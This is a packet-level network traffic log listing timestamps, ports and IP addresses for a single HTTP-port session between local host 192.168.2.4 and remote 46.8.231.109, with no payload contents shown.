Oct 2, 2024 09:41:24.765126944 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.765141964 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.765156031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.765192032 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.765223980 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.765255928 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.765286922 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.765317917 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.765351057 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.765381098 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.765393019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.765393019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.765393019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.765393019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.765393019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.765393019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.765413046 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.765444040 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.765485048 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.765549898 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.765583992 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.765613079 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.765623093 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.765623093 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.765623093 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.765623093 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.765623093 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.765623093 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.765666008 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.765712023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.765752077 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.765767097 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.765784979 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.765825987 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.765871048 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.765871048 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.765871048 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.765873909 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.765908003 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.765974045 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.766108036 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.766206026 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.766237974 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.766325951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.766325951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.766550064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.766597986 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.766705036 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.766736984 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.766768932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.766787052 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.766787052 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.766803980 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.766835928 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.766868114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.766900063 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.766931057 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.766964912 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.766978025 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.766978025 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.766978025 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.766978025 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.766997099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.767030001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.767054081 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.767057896 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.767090082 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.767122984 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.767154932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.767189026 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.767220974 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.767230988 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.767230988 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.767230988 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.767230988 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.767231941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.767231941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.767252922 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.767283916 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.767407894 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.767407894 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.767407894 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.771362066 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.771425962 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.771445036 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.771457911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.771491051 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.771497965 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.771497965 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.771528006 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.771559954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.771591902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.771624088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.771658897 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.771658897 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.771658897 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.771903992 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.771936893 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.771969080 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.772023916 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.772073030 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.772104979 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.772136927 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.772169113 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.772241116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.772273064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.772308111 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.772322893 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.772322893 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.772322893 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.772322893 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.772322893 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.772322893 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.772340059 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.772372961 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.772404909 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.772438049 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.772464991 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.772499084 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.772530079 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.772561073 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.772593021 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.772635937 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.772635937 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.772635937 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.772635937 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.772635937 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.772635937 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.772702932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.772891998 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.772954941 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.773005009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.773035049 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.773066998 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.773097992 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.773132086 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.773163080 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.773195982 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.773226976 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.773238897 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.773238897 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.773238897 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.773238897 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.773238897 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.773238897 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.773260117 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.773315907 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.773550034 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.773550034 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.845120907 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.845194101 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.845228910 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.845261097 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.845294952 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.845328093 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.845360041 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.845391035 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.845422983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.845432043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.845432043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.845432043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.845432043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.845432043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.845453978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.845487118 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.845518112 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.845549107 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.845577955 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.845587969 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.845587969 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.845587969 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.845587969 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.845587969 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.845613003 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.845735073 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.852160931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.852194071 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.852227926 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.852317095 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.852350950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.852385044 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.852458954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.852488041 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.852533102 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.852533102 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.852533102 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.852533102 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.852533102 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.852638960 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.852673054 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.852705956 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.852821112 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.852854013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.852885008 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.852896929 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.852896929 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.852897882 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.852897882 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.852897882 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.852938890 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.852947950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.852998018 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853029966 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853061914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853136063 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853168964 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.853168964 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.853168964 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.853168964 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.853169918 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853193998 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.853202105 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853209972 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.853261948 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853281975 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.853295088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853311062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.853328943 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853359938 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853391886 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853447914 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.853447914 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.853447914 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.853477001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853513002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853543997 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853622913 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853655100 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853686094 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853713989 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853782892 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853813887 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853823900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.853823900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.853823900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.853823900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.853823900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.853823900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.853846073 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853887081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853951931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.853986025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.854012966 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.854053020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854053020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854053020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854053020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854053020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854053020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854125977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.854156971 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.854188919 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.854219913 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.854309082 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.854341984 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.854372978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.854382038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854382038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854382038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854382038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854382038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854382038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854409933 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.854470015 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.854501963 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.854532957 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.854573965 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.854612112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854612112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854612112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854612112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854612112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854612112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854640961 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.854674101 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.854705095 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.854746103 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.854825974 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.854857922 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.854890108 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.854898930 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854898930 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854898930 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854898930 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854898930 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.854967117 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.854998112 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.855030060 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.855061054 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.855102062 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.855140924 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.855142117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.855142117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.855142117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.855142117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.855142117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.855145931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.855179071 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.855211973 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.855242968 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.855274916 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.855406046 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.855407000 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.855407000 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.855407000 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.855407000 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860171080 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860287905 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860312939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860336065 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860351086 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860366106 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860379934 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860394955 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860408068 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860421896 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860424042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860424042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860424042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860424042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860424042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860424042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860435009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860449076 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860452890 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860452890 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860465050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860475063 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860477924 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860492945 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860515118 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860539913 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860552073 CEST	80	49749	46.8.231.109	192.168.2.4
